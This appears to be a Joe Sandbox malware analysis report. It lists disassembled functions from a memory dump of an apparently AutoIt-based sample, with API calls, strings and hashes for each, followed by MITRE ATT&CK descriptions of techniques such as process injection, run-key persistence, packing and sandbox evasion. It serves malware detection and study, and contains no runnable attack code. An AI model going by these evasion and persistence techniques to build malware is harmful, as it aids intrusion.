Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (M
API String ID: 3761405300-1960611114
Opcode ID: 000366ddc48bd0f6f182ae0205af9b6997d644d803b3ca74cde0e457f6640e4a
Instruction ID: 6732da3ac535e256604c924e10f3eb1829dd67b829eb294763aab6194f287861
Opcode Fuzzy Hash: 000366ddc48bd0f6f182ae0205af9b6997d644d803b3ca74cde0e457f6640e4a
Instruction Fuzzy Hash: 6021E2B55022049BEB40DF65E9957453BE5FB48314F20593BE5098B3A1E3F4A980CF8D

Function 0046ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(00000000), ref: 0046ACF5
htons.WS2_32(00000000), ref: 0046AD32

Strings

255.255.255.255, xrefs: 0046AD0D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: e683aed7c2120cb0f43dc7f6c31915e84644bf2a1ecfc3d916a95531c8388933
Instruction ID: 9ad30493ce6906d7147283ff8122fe2d57eae08252ed97b12696a8f319fb2ed4
Opcode Fuzzy Hash: e683aed7c2120cb0f43dc7f6c31915e84644bf2a1ecfc3d916a95531c8388933
Instruction Fuzzy Hash: F7012634600704ABCB109FA4C845FAEB365EF14719F10842BF915AB3D1E739E810CB6A

Function 0044C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0044C5E5

Strings

ComboBox, xrefs: 0044C581
ListBox, xrefs: 0044C5AF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: 96b74a065adbd11766f06fed55d90c99f623d8610e79e9f609a39433c16656ad
Instruction ID: c3bb7e539a21fcde2329aa3a6edfd204918264a02f12bf733314f4091e71bb6e
Opcode Fuzzy Hash: 96b74a065adbd11766f06fed55d90c99f623d8610e79e9f609a39433c16656ad
Instruction Fuzzy Hash: 9601F531642128AFDB45EF65CC91DFE3369AF42310718061FF422E32C1DA796808D758

Function 0045C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0045C4EF
__fread_nolock.LIBCMT ref: 0045C504

Strings

EA06, xrefs: 0045C532

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 8becc78b3dae8849aa5dd8396bd877c2b2b28fe334753d241857e854b611b3bf
Instruction ID: 2dde929fb54a13836118c126df7d0e16485bf0b758561f7b780e915722c3d50e
Opcode Fuzzy Hash: 8becc78b3dae8849aa5dd8396bd877c2b2b28fe334753d241857e854b611b3bf
Instruction Fuzzy Hash: 0E01F9729002187EDB18CB99C856FFE7BF89B15715F00415FE553D2181E578A7088B60

Function 0044C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

SendMessageW.USER32(?,00000180,00000000,?), ref: 0044C4E1

Strings

ComboBox, xrefs: 0044C47D
ListBox, xrefs: 0044C4AB

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: 5b6e5f416300b9f56cf11dbf1c138f5a65fdba2561f8ebca5b3fa2eeb522c3b6
Instruction ID: 639e4603d2e103a5e20d4ca54cc4b7251e6e98d1b84839eb224aad008c0cfa9a
Opcode Fuzzy Hash: 5b6e5f416300b9f56cf11dbf1c138f5a65fdba2561f8ebca5b3fa2eeb522c3b6
Instruction Fuzzy Hash: 6201F771641108ABDB45EB91CEA2FFF33A89F41304F14002FB503E32C1EA5C5E09D2A9

Function 0044C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

SendMessageW.USER32(?,00000182,?,00000000), ref: 0044C562

Strings

ComboBox, xrefs: 0044C500
ListBox, xrefs: 0044C52E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: 440ba1a33746dc5a274423ea545df269e224ef0a92804fc00ed91308a620c7e8
Instruction ID: 727fa01f35de683a595615164c85ecc4aca0744f6bbea3fc91ef545653010eca
Opcode Fuzzy Hash: 440ba1a33746dc5a274423ea545df269e224ef0a92804fc00ed91308a620c7e8
Instruction Fuzzy Hash: 2D01F771642108BBDB41EB55CD82FFF73A85F01740F14002BB503E3181DA6C9E0992AD

Function 0045804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0045806A
_wcscmp.LIBCMT ref: 0045807C

Strings

#32770, xrefs: 00458076

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 73cc00ac6ca0fb3eec9264ef205f4d72ff2e3e5e48ed476ee0cca951b5f1c833
Instruction ID: 6c270f822d4e8bef0fdf17558cc5e33dfb166c76c404fef373adcbf5a666b8e2
Opcode Fuzzy Hash: 73cc00ac6ca0fb3eec9264ef205f4d72ff2e3e5e48ed476ee0cca951b5f1c833
Instruction Fuzzy Hash: 63E0D13760022927D720DF559C05F97F76CF755765F00003BF914E3141D674964587D8

Function 0043DA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

__umatherr.LIBCMT ref: 0043DA2A

Part of subcall function 0043DD86: __ctrlfp.LIBCMT ref: 0043DDE5

__ctrlfp.LIBCMT ref: 0043DA47

Strings

xnH, xrefs: 0043DA3E, 0043DA0F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __ctrlfp$__umatherr
String ID: xnH
API String ID: 219961500-651849585
Opcode ID: abe1a1e6570e1398d67f4d8ccafb7aa96cdf1215927804c0d6b2f137021fbb35
Instruction ID: 579a0139986a6112f3544c5ed1467fc6294c269b77a3c808e23d62f3046cb428
Opcode Fuzzy Hash: abe1a1e6570e1398d67f4d8ccafb7aa96cdf1215927804c0d6b2f137021fbb35
Instruction Fuzzy Hash: A5E0657140860EAADB017F91F9066997BA5EF08314F805099F58C14196DFB68474975B

Function 0044B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0044B36B

Part of subcall function 00432011: _doexit.LIBCMT ref: 0043201B

Strings

AutoIt, xrefs: 0044B35F
Error allocating memory., xrefs: 0044B364

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: e08dc14d5b27c7294c22745ffdac74204e6892cd6896767be89b571edba6dbf3
Instruction ID: 179eea495bb7d401de60c8bbff79d2ae88161ed869538d2263a3a67d28680031
Opcode Fuzzy Hash: e08dc14d5b27c7294c22745ffdac74204e6892cd6896767be89b571edba6dbf3
Instruction Fuzzy Hash: 3FD0123138431832D21526967D07FC576888F19B55F10002BBF08655C28ADAA8D041ED

Function 0045D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0045D01E
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0045D035

Strings

aut, xrefs: 0045D02F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 548beefed19b54c05dca3e7c8c007d595359523c5d57dcf567fcc7e194f95d20
Instruction ID: a0c6c40bd67d91020333d92b62f78e7bf0d0e0c2e3a96dd256ebfc8861ee412c
Opcode Fuzzy Hash: 548beefed19b54c05dca3e7c8c007d595359523c5d57dcf567fcc7e194f95d20
Instruction Fuzzy Hash: 52D05EB594030EBBDB10ABA0ED0EF99B76CA710B05F1041B27614D10D1D2B4D6458BA9

Function 004784C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004784DF
PostMessageW.USER32(00000000), ref: 004784E6

Part of subcall function 00458355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004583CD

Strings

Shell_TrayWnd, xrefs: 004784D8

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 007ca34d958395ab4f090f6b23eea92da0522d1c360d2162846399f9351a7e65
Instruction ID: 0af7e20f8bbb4f4fcadef13c69c7df85e93a20780d1e343eb64b7fe196af2eed
Opcode Fuzzy Hash: 007ca34d958395ab4f090f6b23eea92da0522d1c360d2162846399f9351a7e65
Instruction Fuzzy Hash: 7BD0A9327803007BE760AB709C0BFC66604AB28B02F00083E7709AA1C0C8A4B8008228

Function 00478495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0047849F
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004784B2

Part of subcall function 00458355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004583CD

Strings

Shell_TrayWnd, xrefs: 00478498

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ac012c63e0bc594d327f499e68417c693be76d1e34c8c2ec13274e71602c3839
Instruction ID: 4829ad1a65f4aeee516eb44e300ec6b9dee67110cf110f5b7aa3fbb30db8234a
Opcode Fuzzy Hash: ac012c63e0bc594d327f499e68417c693be76d1e34c8c2ec13274e71602c3839
Instruction Fuzzy Hash: 8CD0A932784300B7E760AB709C0BFC66A04AB24B02F00083E7709AA1C0C8A4A8008228

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

